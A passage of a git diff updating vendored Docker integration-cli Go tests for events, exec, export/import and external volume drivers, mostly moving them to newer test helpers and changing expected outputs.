dockerCmdWithResult("events", "--format", "{{.badFieldString}}") - c.Assert(result, icmd.Matches, icmd.Expected{ + result.Assert(c, icmd.Expected{ Error: "exit status 64", ExitCode: 64, Err: "Error parsing format: template: :1:2: executing \"\" at <.badFieldString>: can't evaluate field badFieldString in type *events.Message", diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_events_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_events_unix_test.go index dc91667116..343b900342 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_events_unix_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_events_unix_test.go @@ -10,13 +10,14 @@ import ( "os" "os/exec" "strings" - "syscall" "time" "unicode" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli/build" "github.com/go-check/check" "github.com/kr/pty" + "golang.org/x/sys/unix" ) // #5979 @@ -48,7 +49,7 @@ func (s *DockerSuite) TestEventsRedirectStdout(c *check.C) { } func (s *DockerSuite) TestEventsOOMDisableFalse(c *check.C) { - testRequires(c, DaemonIsLinux, oomControl, memoryLimitSupport, swapMemorySupport) + testRequires(c, DaemonIsLinux, oomControl, memoryLimitSupport, swapMemorySupport, NotPpc64le) errChan := make(chan error) go func() { @@ -78,7 +79,7 @@ func (s *DockerSuite) TestEventsOOMDisableFalse(c *check.C) { } func (s *DockerSuite) TestEventsOOMDisableTrue(c *check.C) { - testRequires(c, DaemonIsLinux, oomControl, memoryLimitSupport, NotArm, swapMemorySupport) + testRequires(c, DaemonIsLinux, oomControl, memoryLimitSupport, NotArm, swapMemorySupport, NotPpc64le) errChan := make(chan error) observer, err := newEventObserver(c) @@ -96,7 +97,7 @@ func (s *DockerSuite) TestEventsOOMDisableTrue(c *check.C) { }() c.Assert(waitRun("oomTrue"), checker.IsNil) - defer dockerCmd(c, "kill", "oomTrue") + defer dockerCmdWithResult("kill", "oomTrue") containerID := inspectField(c, "oomTrue", "Id") testActions := map[string]chan bool{ @@ -111,7 +112,7 @@ func (s *DockerSuite) TestEventsOOMDisableTrue(c *check.C) { case <-time.After(20 * time.Second): observer.CheckEventError(c, containerID, "oom", matcher) case <-testActions["oom"]: - // ignore, done + // ignore, done case errRun := <-errChan: if errRun != nil { c.Fatalf("%v", errRun) @@ -184,11 +185,12 @@ func (s *DockerSuite) TestVolumeEvents(c *check.C) { c.Assert(len(events), checker.GreaterThan, 4) volumeEvents := eventActionsByIDAndType(c, events, "test-event-volume-local", "volume") - c.Assert(volumeEvents, checker.HasLen, 4) + c.Assert(volumeEvents, checker.HasLen, 5) c.Assert(volumeEvents[0], checker.Equals, "create") - c.Assert(volumeEvents[1], checker.Equals, "mount") - c.Assert(volumeEvents[2], checker.Equals, "unmount") - c.Assert(volumeEvents[3], checker.Equals, "destroy") + c.Assert(volumeEvents[1], checker.Equals, "create") + c.Assert(volumeEvents[2], checker.Equals, "mount") + c.Assert(volumeEvents[3], checker.Equals, "unmount") + c.Assert(volumeEvents[4], checker.Equals, "destroy") } func (s *DockerSuite) TestNetworkEvents(c *check.C) { @@ -310,11 +312,9 @@ func (s *DockerSuite) TestEventsImageUntagDelete(c *check.C) { defer observer.Stop() name := "testimageevents" - imageID, err := buildImage(name, - `FROM scratch - MAINTAINER "docker"`, - true) - c.Assert(err, checker.IsNil) + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM scratch + MAINTAINER "docker"`)) + imageID := getIDByName(c, name) c.Assert(deleteImages(name), checker.IsNil) testActions := map[string]chan bool{ @@ -400,7 +400,7 @@ func (s *DockerDaemonSuite) TestDaemonEvents(c *check.C) { daemonConfig := `{"labels":["foo=bar"]}` fmt.Fprintf(configFile, "%s", daemonConfig) configFile.Close() - c.Assert(s.d.Start(fmt.Sprintf("--config-file=%s", configFilePath)), check.IsNil) + s.d.Start(c, fmt.Sprintf("--config-file=%s", configFilePath)) // Get daemon ID out, err := s.d.Cmd("info") @@ -422,14 +422,39 @@ func (s *DockerDaemonSuite) TestDaemonEvents(c *check.C) { fmt.Fprintf(configFile, "%s", daemonConfig) configFile.Close() - syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + c.Assert(s.d.Signal(unix.SIGHUP), checker.IsNil) time.Sleep(3 * time.Second) out, err = s.d.Cmd("events", "--since=0", "--until", daemonUnixTime(c)) c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, fmt.Sprintf("daemon reload %s (cluster-advertise=, cluster-store=, cluster-store-opts={}, debug=true, default-runtime=runc, insecure-registries=[], labels=[\"bar=foo\"], live-restore=false, max-concurrent-downloads=1, max-concurrent-uploads=5, name=%s, runtimes=runc:{docker-runc []}, shutdown-timeout=10)", daemonID, daemonName)) + // only check for values known (daemon ID/name) or explicitly set above, + // otherwise just check for names being present. + expectedSubstrings := []string{ + " daemon reload " + daemonID + " ", + "(allow-nondistributable-artifacts=[", + " cluster-advertise=, ", + " cluster-store=, ", + " cluster-store-opts=", + " debug=true, ", + " default-ipc-mode=", + " default-runtime=", + " default-shm-size=", + " insecure-registries=[", + " labels=[\"bar=foo\"], ", + " live-restore=", + " max-concurrent-downloads=1, ", + " max-concurrent-uploads=5, ", + " name=" + daemonName, + " registry-mirrors=[", + " runtimes=", + " shutdown-timeout=10)", + } + + for _, s := range expectedSubstrings { + c.Assert(out, checker.Contains, s) + } } func (s *DockerDaemonSuite) TestDaemonEventsWithFilters(c *check.C) { @@ -444,7 +469,7 @@ func (s *DockerDaemonSuite) TestDaemonEventsWithFilters(c *check.C) { daemonConfig := `{"labels":["foo=bar"]}` fmt.Fprintf(configFile, "%s", daemonConfig) configFile.Close() - c.Assert(s.d.Start(fmt.Sprintf("--config-file=%s", configFilePath)), check.IsNil) + s.d.Start(c, fmt.Sprintf("--config-file=%s", configFilePath)) // Get daemon ID out, err := s.d.Cmd("info") @@ -460,7 +485,7 @@ func (s *DockerDaemonSuite) TestDaemonEventsWithFilters(c *check.C) { } c.Assert(daemonID, checker.Not(checker.Equals), "") - syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + c.Assert(s.d.Signal(unix.SIGHUP), checker.IsNil) time.Sleep(3 * time.Second) diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_test.go index cac76d96ae..e97fb85140 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_test.go @@ -4,8 +4,8 @@ package main import ( "bufio" + "context" "fmt" - "net/http" "os" "os/exec" "reflect" @@ -15,9 +15,12 @@ import ( "sync" "time" - "github.com/docker/docker/pkg/integration/checker" - icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" "github.com/go-check/check" + "gotest.tools/icmd" ) func (s *DockerSuite) TestExec(c *check.C) { @@ -68,7 +71,7 @@ func (s *DockerSuite) TestExecInteractive(c *check.C) { } func (s *DockerSuite) TestExecAfterContainerRestart(c *check.C) { - out, _ := runSleepingContainer(c) + out := runSleepingContainer(c) cleanedContainerID := strings.TrimSpace(out) c.Assert(waitRun(cleanedContainerID), check.IsNil) dockerCmd(c, "restart", cleanedContainerID) @@ -81,17 +84,13 @@ func (s *DockerSuite) TestExecAfterContainerRestart(c *check.C) { func (s *DockerDaemonSuite) TestExecAfterDaemonRestart(c *check.C) { // TODO Windows CI: Requires a little work to get this ported. - testRequires(c, DaemonIsLinux) - testRequires(c, SameHostDaemon) - - err := s.d.StartWithBusybox() - c.Assert(err, checker.IsNil) + testRequires(c, DaemonIsLinux, SameHostDaemon) + s.d.StartWithBusybox(c) out, err := s.d.Cmd("run", "-d", "--name", "top", "-p", "80", "busybox:latest", "top") c.Assert(err, checker.IsNil, check.Commentf("Could not run top: %s", out)) - err = s.d.Restart() - c.Assert(err, checker.IsNil, check.Commentf("Could not restart daemon")) + s.d.Restart(c) out, err = s.d.Cmd("start", "top") c.Assert(err, checker.IsNil, check.Commentf("Could not start top after daemon restart: %s", out)) @@ -134,19 +133,18 @@ func (s *DockerSuite) TestExecExitStatus(c *check.C) { runSleepingContainer(c, "-d", "--name", "top") result := icmd.RunCommand(dockerBinary, "exec", "top", "sh", "-c", "exit 23") - c.Assert(result, icmd.Matches, icmd.Expected{ExitCode: 23, Error: "exit status 23"}) + result.Assert(c, icmd.Expected{ExitCode: 23, Error: "exit status 23"}) } func (s *DockerSuite) TestExecPausedContainer(c *check.C) { testRequires(c, IsPausable) - defer unpauseAllContainers() - out, _ := runSleepingContainer(c, "-d", "--name", "testing") + out := runSleepingContainer(c, "-d", "--name", "testing") ContainerID := strings.TrimSpace(out) dockerCmd(c, "pause", "testing") - out, _, err := dockerCmdWithError("exec", "-i", "-t", ContainerID, "echo", "hello") - c.Assert(err, checker.NotNil, check.Commentf("container should fail to exec new conmmand if it is paused")) + out, _, err := dockerCmdWithError("exec", ContainerID, "echo", "hello") + c.Assert(err, checker.NotNil, check.Commentf("container should fail to exec new command if it is paused")) expected := ContainerID + " is paused, unpause the container before exec" c.Assert(out, checker.Contains, expected, check.Commentf("container should not exec new command if it is paused")) @@ -210,6 +208,7 @@ func (s *DockerSuite) TestExecTTYWithoutStdin(c *check.C) { } } +// FIXME(vdemeester) this should be a unit tests on cli/command/container package func (s *DockerSuite) TestExecParseError(c *check.C) { // TODO Windows CI: Requires some extra work. Consider copying the // runSleepingContainer helper to have an exec version. @@ -217,10 +216,11 @@ func (s *DockerSuite) TestExecParseError(c *check.C) { dockerCmd(c, "run", "-d", "--name", "top", "busybox", "top") // Test normal (non-detached) case first - cmd := exec.Command(dockerBinary, "exec", "top") - _, stderr, _, err := runCommandWithStdoutStderr(cmd) - c.Assert(err, checker.NotNil) - c.Assert(stderr, checker.Contains, "See 'docker exec --help'") + icmd.RunCommand(dockerBinary, "exec", "top").Assert(c, icmd.Expected{ + ExitCode: 1, + Error: "exit status 1", + Err: "See 'docker exec --help'", + }) } func (s *DockerSuite) TestExecStopNotHanging(c *check.C) { @@ -229,18 +229,18 @@ func (s *DockerSuite) TestExecStopNotHanging(c *check.C) { testRequires(c, DaemonIsLinux) dockerCmd(c, "run", "-d", "--name", "testing", "busybox", "top") - err := exec.Command(dockerBinary, "exec", "testing", "top").Start() - c.Assert(err, checker.IsNil) + result := icmd.StartCmd(icmd.Command(dockerBinary, "exec", "testing", "top")) + result.Assert(c, icmd.Success) + go icmd.WaitOnCmd(0, result) type dstop struct { - out []byte + out string err error } - ch := make(chan dstop) go func() { - out, err := exec.Command(dockerBinary, "stop", "testing").CombinedOutput() - ch <- dstop{out, err} + result := icmd.RunCommand(dockerBinary, "stop", "testing") + ch <- dstop{result.Combined(), result.Error} close(ch) }() select { @@ -262,7 +262,7 @@ func (s *DockerSuite) TestExecCgroup(c *check.C) { var wg sync.WaitGroup var mu sync.Mutex - execCgroups := []sort.StringSlice{} + var execCgroups []sort.StringSlice errChan := make(chan error) // exec a few times concurrently to get consistent failure for i := 0; i < 5; i++ { @@ -305,7 +305,7 @@ func (s *DockerSuite) TestExecCgroup(c *check.C) { } func (s *DockerSuite) TestExecInspectID(c *check.C) { - out, _ := runSleepingContainer(c, "-d") + out := runSleepingContainer(c, "-d") id := strings.TrimSuffix(out, "\n") out = inspectField(c, id, "ExecIDs") @@ -357,15 +357,21 @@ func (s *DockerSuite) TestExecInspectID(c *check.C) { } // But we should still be able to query the execID - sc, body, err := sockRequest("GET", "/exec/"+execID+"/json", nil) - c.Assert(sc, checker.Equals, http.StatusOK, check.Commentf("received status != 200 OK: %d\n%s", sc, body)) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + _, err = cli.ContainerExecInspect(context.Background(), execID) + c.Assert(err, checker.IsNil) // Now delete the container and then an 'inspect' on the exec should // result in a 404 (not 'container not running') out, ec := dockerCmd(c, "rm", "-f", id) c.Assert(ec, checker.Equals, 0, check.Commentf("error removing container: %s", out)) - sc, body, err = sockRequest("GET", "/exec/"+execID+"/json", nil) - c.Assert(sc, checker.Equals, http.StatusNotFound, check.Commentf("received status != 404: %d\n%s", sc, body)) + + _, err = cli.ContainerExecInspect(context.Background(), execID) + expected := "No such exec instance" + c.Assert(err.Error(), checker.Contains, expected) } func (s *DockerSuite) TestLinksPingLinkedContainersOnRename(c *check.C) { @@ -388,10 +394,12 @@ func (s *DockerSuite) TestRunMutableNetworkFiles(c *check.C) { // Not applicable on Windows to Windows CI. testRequires(c, SameHostDaemon, DaemonIsLinux) for _, fn := range []string{"resolv.conf", "hosts"} { - deleteAllContainers() + containers := cli.DockerCmd(c, "ps", "-q", "-a").Combined() + if containers != "" { + cli.DockerCmd(c, append([]string{"rm", "-fv"}, strings.Split(strings.TrimSpace(containers), "\n")...)...) + } - content, err := runCommandAndReadContainerFile(fn, exec.Command(dockerBinary, "run", "-d", "--name", "c1", "busybox", "sh", "-c", fmt.Sprintf("echo success >/etc/%s && top", fn))) - c.Assert(err, checker.IsNil) + content := runCommandAndReadContainerFile(c, fn, dockerBinary, "run", "-d", "--name", "c1", "busybox", "sh", "-c", fmt.Sprintf("echo success >/etc/%s && top", fn)) c.Assert(strings.TrimSpace(string(content)), checker.Equals, "success", check.Commentf("Content was not what was modified in the container", string(content))) @@ -443,30 +451,27 @@ func (s *DockerSuite) TestExecWithPrivileged(c *check.C) { dockerCmd(c, "run", "-d", "--name", "parent", "--cap-drop=ALL", "busybox", "sh", "-c", `while (true); do if [ -e /exec_priv ]; then cat /exec_priv && mknod /tmp/sda b 8 0 && echo "Success"; else echo "Privileged exec has not run yet"; fi; usleep 10000; done`) // Check exec mknod doesn't work - cmd := exec.Command(dockerBinary, "exec", "parent", "sh", "-c", "mknod /tmp/sdb b 8 16") - out, _, err := runCommandWithOutput(cmd) - c.Assert(err, checker.NotNil, check.Commentf("exec mknod in --cap-drop=ALL container without --privileged should fail")) - c.Assert(out, checker.Contains, "Operation not permitted", check.Commentf("exec mknod in --cap-drop=ALL container without --privileged should fail")) + icmd.RunCommand(dockerBinary, "exec", "parent", "sh", "-c", "mknod /tmp/sdb b 8 16").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) // Check exec mknod does work with --privileged - cmd = exec.Command(dockerBinary, "exec", "--privileged", "parent", "sh", "-c", `echo "Running exec --privileged" > /exec_priv && mknod /tmp/sdb b 8 16 && usleep 50000 && echo "Finished exec --privileged" > /exec_priv && echo ok`) - out, _, err = runCommandWithOutput(cmd) - c.Assert(err, checker.IsNil) + result := icmd.RunCommand(dockerBinary, "exec", "--privileged", "parent", "sh", "-c", `echo "Running exec --privileged" > /exec_priv && mknod /tmp/sdb b 8 16 && usleep 50000 && echo "Finished exec --privileged" > /exec_priv && echo ok`) + result.Assert(c, icmd.Success) - actual := strings.TrimSpace(out) - c.Assert(actual, checker.Equals, "ok", check.Commentf("exec mknod in --cap-drop=ALL container with --privileged failed, output: %q", out)) + actual := strings.TrimSpace(result.Combined()) + c.Assert(actual, checker.Equals, "ok", check.Commentf("exec mknod in --cap-drop=ALL container with --privileged failed, output: %q", result.Combined())) // Check subsequent unprivileged exec cannot mknod - cmd = exec.Command(dockerBinary, "exec", "parent", "sh", "-c", "mknod /tmp/sdc b 8 32") - out, _, err = runCommandWithOutput(cmd) - c.Assert(err, checker.NotNil, check.Commentf("repeating exec mknod in --cap-drop=ALL container after --privileged without --privileged should fail")) - c.Assert(out, checker.Contains, "Operation not permitted", check.Commentf("repeating exec mknod in --cap-drop=ALL container after --privileged without --privileged should fail")) - + icmd.RunCommand(dockerBinary, "exec", "parent", "sh", "-c", "mknod /tmp/sdc b 8 32").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) // Confirm at no point was mknod allowed - logCmd := exec.Command(dockerBinary, "logs", "parent") - out, _, err = runCommandWithOutput(logCmd) - c.Assert(err, checker.IsNil) - c.Assert(out, checker.Not(checker.Contains), "Success") + result = icmd.RunCommand(dockerBinary, "logs", "parent") + result.Assert(c, icmd.Success) + c.Assert(result.Combined(), checker.Not(checker.Contains), "Success") } @@ -474,13 +479,9 @@ func (s *DockerSuite) TestExecWithImageUser(c *check.C) { // Not applicable on Windows testRequires(c, DaemonIsLinux) name := "testbuilduser" - _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd - USER dockerio`, - true) - c.Assert(err, checker.IsNil) - + USER dockerio`)) dockerCmd(c, "run", "-d", "--name", "dockerioexec", name, "top") out, _ := dockerCmd(c, "exec", "dockerioexec", "whoami") @@ -498,12 +499,12 @@ func (s *DockerSuite) TestExecOnReadonlyContainer(c *check.C) { func (s *DockerSuite) TestExecUlimits(c *check.C) { testRequires(c, DaemonIsLinux) name := "testexeculimits" - runSleepingContainer(c, "-d", "--ulimit", "nproc=21", "--name", name) + runSleepingContainer(c, "-d", "--ulimit", "nofile=511:511", "--name", name) c.Assert(waitRun(name), checker.IsNil) - out, _, err := dockerCmdWithError("exec", name, "sh", "-c", "ulimit -p") + out, _, err := dockerCmdWithError("exec", name, "sh", "-c", "ulimit -n") c.Assert(err, checker.IsNil) - c.Assert(strings.TrimSpace(out), checker.Equals, "21") + c.Assert(strings.TrimSpace(out), checker.Equals, "511") } // #15750 @@ -549,6 +550,7 @@ func (s *DockerSuite) TestExecWindowsOpenHandles(c *check.C) { exec <- true }() + count := 0 for { top := make(chan string) var out string @@ -559,7 +561,7 @@ func (s *DockerSuite) TestExecWindowsOpenHandles(c *check.C) { select { case <-time.After(time.Second * 5): - c.Error("timed out waiting for top while exec is exiting") + c.Fatal("timed out waiting for top while exec is exiting") case out = <-top: break } @@ -568,6 +570,10 @@ func (s *DockerSuite) TestExecWindowsOpenHandles(c *check.C) { // The initial exec process (cmd.exe) has exited, and both sleeps are currently running break } + count++ + if count >= 30 { + c.Fatal("too many retries") + } time.Sleep(1 * time.Second) } @@ -579,7 +585,7 @@ func (s *DockerSuite) TestExecWindowsOpenHandles(c *check.C) { select { case <-time.After(time.Second * 5): - c.Error("timed out waiting for inspect while exec is exiting") + c.Fatal("timed out waiting for inspect while exec is exiting") case <-inspect: break } @@ -591,7 +597,7 @@ func (s *DockerSuite) TestExecWindowsOpenHandles(c *check.C) { // The exec should exit when the background sleep exits select { case <-time.After(time.Second * 15): - c.Error("timed out waiting for async exec to exit") + c.Fatal("timed out waiting for async exec to exit") case <-exec: // Ensure the background sleep has actually exited out, _ := dockerCmd(c, "top", "test") diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_unix_test.go index 5f691196f1..4c77df4f11 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_unix_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_unix_test.go @@ -9,7 +9,7 @@ import ( "strings" "time" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" "github.com/kr/pty" ) @@ -25,7 +25,6 @@ func (s *DockerSuite) TestExecInteractiveStdinClose(c *check.C) { c.Assert(err, checker.IsNil) b := bytes.NewBuffer(nil) - go io.Copy(b, p) ch := make(chan error) go func() { ch <- cmd.Wait() }() @@ -33,9 +32,14 @@ func (s *DockerSuite) TestExecInteractiveStdinClose(c *check.C) { select { case err := <-ch: c.Assert(err, checker.IsNil) - output := b.String() + io.Copy(b, p) + p.Close() + bs := b.Bytes() + bs = bytes.Trim(bs, "\x00") + output := string(bs[:]) c.Assert(strings.TrimSpace(output), checker.Equals, "hello") case <-time.After(5 * time.Second): + p.Close() c.Fatal("timed out running docker exec") } } @@ -69,7 +73,7 @@ func (s *DockerSuite) TestExecTTY(c *check.C) { c.Assert(bytes.Contains(buf, []byte("hello")), checker.Equals, true, check.Commentf(string(buf[:read]))) } -// Test the the TERM env var is set when -t is provided on exec +// Test the TERM env var is set when -t is provided on exec func (s *DockerSuite) TestExecWithTERM(c *check.C) { testRequires(c, DaemonIsLinux, SameHostDaemon) out, _ := dockerCmd(c, "run", "-id", "busybox", "/bin/cat") diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_experimental_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_experimental_test.go deleted file mode 100644 index 6a49cc8cb1..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_experimental_test.go +++ /dev/null @@ -1,36 +0,0 @@ -package main - -import ( - "strings" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestExperimentalVersionTrue(c *check.C) { - testRequires(c, ExperimentalDaemon) - - out, _ := dockerCmd(c, "version") - for _, line := range strings.Split(out, "\n") { - if strings.HasPrefix(strings.TrimSpace(line), "Experimental:") { - c.Assert(line, checker.Matches, "*true") - return - } - } - - c.Fatal(`"Experimental" not found in version output`) -} - -func (s *DockerSuite) TestExperimentalVersionFalse(c *check.C) { - testRequires(c, NotExperimentalDaemon) - - out, _ := dockerCmd(c, "version") - for _, line := range strings.Split(out, "\n") { - if strings.HasPrefix(strings.TrimSpace(line), "Experimental:") { - c.Assert(line, checker.Matches, "*false") - return - } - } - - c.Fatal(`"Experimental" not found in version output`) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_export_import_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_export_import_test.go index 069dc08162..d0dac97367 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_export_import_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_export_import_test.go @@ -2,31 +2,15 @@ package main import ( "os" - "os/exec" "strings" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" + "gotest.tools/icmd" ) -// export an image and try to import it into a new one -func (s *DockerSuite) TestExportContainerAndImportImage(c *check.C) { - testRequires(c, DaemonIsLinux) - containerID := "testexportcontainerandimportimage" - - dockerCmd(c, "run", "--name", containerID, "busybox", "true") - - out, _ := dockerCmd(c, "export", containerID) - - importCmd := exec.Command(dockerBinary, "import", "-", "repo/testexp:v1") - importCmd.Stdin = strings.NewReader(out) - out, _, err := runCommandWithOutput(importCmd) - c.Assert(err, checker.IsNil, check.Commentf("failed to import image repo/testexp:v1: %s", out)) - - cleanedImageID := strings.TrimSpace(out) - c.Assert(cleanedImageID, checker.Not(checker.Equals), "", check.Commentf("output should have been an image id")) -} - +// TODO: Move this test to docker/cli, as it is essentially the same test +// as TestExportContainerAndImportImage except output to a file. // Used to test output flag in the export command func (s *DockerSuite) TestExportContainerWithOutputAndImportImage(c *check.C) { testRequires(c, DaemonIsLinux) @@ -36,14 +20,15 @@ func (s *DockerSuite) TestExportContainerWithOutputAndImportImage(c *check.C) { dockerCmd(c, "export", "--output=testexp.tar", containerID) defer os.Remove("testexp.tar") - out, _, err := runCommandWithOutput(exec.Command("cat", "testexp.tar")) - c.Assert(err, checker.IsNil, check.Commentf(out)) + resultCat := icmd.RunCommand("cat", "testexp.tar") + resultCat.Assert(c, icmd.Success) - importCmd := exec.Command(dockerBinary, "import", "-", "repo/testexp:v1") - importCmd.Stdin = strings.NewReader(out) - out, _, err = runCommandWithOutput(importCmd) - c.Assert(err, checker.IsNil, check.Commentf("failed to import image repo/testexp:v1: %s", out)) + result := icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "import", "-", "repo/testexp:v1"}, + Stdin: strings.NewReader(resultCat.Combined()), + }) + result.Assert(c, icmd.Success) - cleanedImageID := strings.TrimSpace(out) + cleanedImageID := strings.TrimSpace(result.Combined()) c.Assert(cleanedImageID, checker.Not(checker.Equals), "", check.Commentf("output should have been an image id")) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_external_volume_driver_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_external_volume_driver_unix_test.go index 806d87ec77..719473b13e 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_external_volume_driver_unix_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_external_volume_driver_unix_test.go @@ -16,7 +16,9 @@ import ( "time" "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/daemon" + testdaemon "github.com/docker/docker/internal/test/daemon" "github.com/docker/docker/pkg/stringid" "github.com/docker/docker/volume" "github.com/go-check/check" @@ -44,18 +46,21 @@ type eventCounter struct { type DockerExternalVolumeSuite struct { ds *DockerSuite - d *Daemon + d *daemon.Daemon *volumePlugin } func (s *DockerExternalVolumeSuite) SetUpTest(c *check.C) { - s.d = NewDaemon(c) + testRequires(c, SameHostDaemon) + s.d = daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) s.ec = &eventCounter{} } func (s *DockerExternalVolumeSuite) TearDownTest(c *check.C) { - s.d.Stop() - s.ds.TearDownTest(c) + if s.d != nil { + s.d.Stop(c) + s.ds.TearDownTest(c) + } } func (s *DockerExternalVolumeSuite) SetUpSuite(c *check.C) { @@ -98,10 +103,8 @@ func newVolumePlugin(c *check.C, name string) *volumePlugin { read := func(b io.ReadCloser) (pluginRequest, error) { defer b.Close() var pr pluginRequest - if err := json.NewDecoder(b).Decode(&pr); err != nil { - return pr, err - } - return pr, nil + err := json.NewDecoder(b).Decode(&pr) + return pr, err } send := func(w http.ResponseWriter, data interface{}) { @@ -284,20 +287,15 @@ func (s *DockerExternalVolumeSuite) TestVolumeCLICreateOptionConflict(c *check.C out, _, err := dockerCmdWithError("volume", "create", "test", "--driver", volumePluginName) c.Assert(err, check.NotNil, check.Commentf("volume create exception name already in use with another driver")) - c.Assert(out, checker.Contains, "A volume named test already exists") + c.Assert(out, checker.Contains, "must be unique") out, _ = dockerCmd(c, "volume", "inspect", "--format={{ .Driver }}", "test") _, _, err = dockerCmdWithError("volume", "create", "test", "--driver", strings.TrimSpace(out)) c.Assert(err, check.IsNil) - - // make sure hidden --name option conflicts with positional arg name - out, _, err = dockerCmdWithError("volume", "create", "--name", "test2", "test2") - c.Assert(err, check.NotNil, check.Commentf("Conflicting options: either specify --name or provide positional arg, not both")) } func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverNamed(c *check.C) { - err := s.d.StartWithBusybox() - c.Assert(err, checker.IsNil) + s.d.StartWithBusybox(c) out, err := s.d.Cmd("run", "--rm", "--name", "test-data", "-v", "external-volume-test:/tmp/external-volume-test", "--volume-driver", volumePluginName, "busybox:latest", "cat", "/tmp/external-volume-test/test") c.Assert(err, checker.IsNil, check.Commentf(out)) @@ -319,8 +317,7 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverNamed(c *check.C) { } func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverUnnamed(c *check.C) { - err := s.d.StartWithBusybox() - c.Assert(err, checker.IsNil) + s.d.StartWithBusybox(c) out, err := s.d.Cmd("run", "--rm", "--name", "test-data", "-v", "/tmp/external-volume-test", "--volume-driver", volumePluginName, "busybox:latest", "cat", "/tmp/external-volume-test/test") c.Assert(err, checker.IsNil, check.Commentf(out)) @@ -334,8 +331,7 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverUnnamed(c *check.C) } func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverVolumesFrom(c *check.C) { - err := s.d.StartWithBusybox() - c.Assert(err, checker.IsNil) + s.d.StartWithBusybox(c) out, err := s.d.Cmd("run", "--name", "vol-test1", "-v", "/foo", "--volume-driver", volumePluginName, "busybox:latest") c.Assert(err, checker.IsNil, check.Commentf(out)) @@ -354,8 +350,7 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverVolumesFrom(c *check } func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverDeleteContainer(c *check.C) { - err := s.d.StartWithBusybox() - c.Assert(err, checker.IsNil) + s.d.StartWithBusybox(c) out, err := s.d.Cmd("run", "--name", "vol-test1", "-v", "/foo", "--volume-driver", volumePluginName, "busybox:latest") c.Assert(err, checker.IsNil, check.Commentf(out)) @@ -412,26 +407,24 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverLookupNotBlocked(c * } func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverRetryNotImmediatelyExists(c *check.C) { - err := s.d.StartWithBusybox() - c.Assert(err, checker.IsNil) - - specPath := "/etc/docker/plugins/test-external-volume-driver-retry.spec" - os.RemoveAll(specPath) - defer os.RemoveAll(specPath) + s.d.StartWithBusybox(c) + driverName := "test-external-volume-driver-retry" errchan := make(chan error) + started := make(chan struct{}) go func() { - if out, err := s.d.Cmd("run", "--rm", "--name", "test-data-retry", "-v", "external-volume-test:/tmp/external-volume-test", "--volume-driver", "test-external-volume-driver-retry", "busybox:latest"); err != nil { + close(started) + if out, err := s.d.Cmd("run", "--rm", "--name", "test-data-retry", "-v", "external-volume-test:/tmp/external-volume-test", "--volume-driver", driverName, "busybox:latest"); err != nil { errchan <- fmt.Errorf("%v:\n%s", err, out) } close(errchan) }() - go func() { - // wait for a retry to occur, then create spec to allow plugin to register - time.Sleep(2000 * time.Millisecond) - // no need to check for an error here since it will get picked up by the timeout later - ioutil.WriteFile(specPath, []byte(s.Server.URL), 0644) - }() + + <-started + // wait for a retry to occur, then create spec to allow plugin to register + time.Sleep(2 * time.Second) + p := newVolumePlugin(c, driverName) + defer p.Close() select { case err := <-errchan: @@ -440,14 +433,14 @@ func (s *DockerExternalVolumeSuite) 